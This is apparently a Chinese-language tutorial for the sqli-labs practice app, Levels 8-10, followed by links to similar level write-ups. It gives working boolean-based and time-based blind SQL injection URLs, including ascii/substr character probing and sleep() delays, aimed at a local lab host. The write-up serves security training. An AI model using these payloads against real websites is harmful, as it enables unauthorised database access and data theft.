10、sqli-labs(盲注8-10)

简介: 10、sqli-labs(盲注8-10)

环境sqli-labs

less 8

一、通过判断是单引号闭合

http://192.168.1.119/sqli/Less-8/?id=1’ --+

二、我们查询一下数据库有多少字节

http://192.168.1.119/sqli/Less-8/?id=1’ and LENGTH(database())>=8 --+

三、判断数据库的第一个和第二个字母是s、e(ascii码是115,101)

http://192.168.1.119/sqli/Less-8/?id=1’ and ascii(substr(database(),1,1))>=115 --+

http://192.168.1.119/sqli/Less-8/?id=1’ and ascii(substr(database(),2,1))>=101 --+

Less 9

因为不管我们怎么输入,返回的都是同样的信息,但是我们又想知道是否存在注入,我们通过sleep(5)延时来判断是否成功执行了sql语句

一、如果报错婷5秒

http://192.168.1.119/sqli/Less-9/?id=1’ and sleep(5) --+

二、如果数据库名的第一个字母是s停留5秒

http://192.168.1.119/sqli/Less-9/?id=1’ and if(ascii(substr(database(),1,1))>=115, 0, sleep(5)) --+

Less 10

同上,只是由单引号变为双引号

一、如果报错婷5秒

http://192.168.1.119/sqli/Less-10/?id=1” and sleep(5) --+

二、如果数据库名的第一个字母是s停留5秒

http://192.168.1.119/sqli/Less-10/?id=1" and if(ascii(substr(database(),1,1))>=115, 0, sleep(5)) --+

禁止非法,后果自负

目录
相关文章
|
6月前
|
安全 数据库 数据安全/隐私保护
sqli-labs第一关
sqli-labs第一关
|
SQL 数据库
10、sqli-labs(盲注8-10)
10、sqli-labs(盲注8-10)
50 0
SQLi LABS Less-29
第29关使用GET请求提交参数,在url中构造payload即可 源码中并没有做什么过滤,直接测试注入点即可
210 0
SQLi LABS Less-29
SQLi LABS Less-26
第26关使用GET请求提交参数,我们可以直接在url地址栏中构造payload 源码中过滤了or,and,/*,#,--,空格,斜线,需要想办法绕过
262 0
SQLi LABS Less-26
SQLi LABS Less-25a
第25a关使用GET请求传递参数,在url地址栏中构造payload即可 后端源码中过滤了and和or,但只过滤了一次,我们可以通过双写绕过
222 0
SQLi LABS Less-25a
|
SQL 数据库
SQLi LABS Less-27a
第27关使用GET请求提交参数,在url地址栏中构造payload即可 后端源码中过滤了/*,--,#,空格,select,union,需要考虑一下怎么绕过这些规则
180 0
SQLi LABS Less-27a
SQLi LABS Less-31
第31关的源码中并未对参数做过多的过滤,只是在参数两边拼接了双引号和括号
152 0
SQLi LABS Less-31
|
SQL 数据库 数据安全/隐私保护
SQLi LABS Less-16
第16关使用POST请求提交参数,可以使用代理工具抓包或直接在输入框中修改参数 后端代码根据用户输入账号和密码去数据库中查询,查询成功则返回登录成功,否则返回登录失败,页面没有显示的数据,SQL语句中使用了错误抑制符@来限制数据库的报错信息,因此不能使用联合注入或报错注入,推荐使用布尔盲注,源码如下
149 0
SQLi LABS Less-16
|
SQL 数据库 数据安全/隐私保护
SQLi LABS Less-21
21关使用POST请求提交参数,对用户名和密码中的特殊字符进行了转译,难度较大
166 0
SQLi LABS Less-21
|
数据库 数据安全/隐私保护
SQLi LABS Less-19
第19关使用POST请求提交参数,后端对用户名和密码进行了特殊字符转译,难度较大源码如下
178 0
SQLi LABS Less-19